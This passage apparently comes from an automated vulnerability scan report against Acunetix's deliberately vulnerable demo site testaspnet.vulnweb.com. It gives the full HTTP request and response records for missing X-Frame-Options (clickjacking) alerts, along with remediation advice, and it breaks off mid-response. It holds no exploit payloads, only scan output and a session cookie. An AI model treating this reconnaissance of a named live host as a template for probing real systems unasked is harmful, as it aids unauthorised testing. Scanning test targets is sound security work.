          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        9. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        10. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNl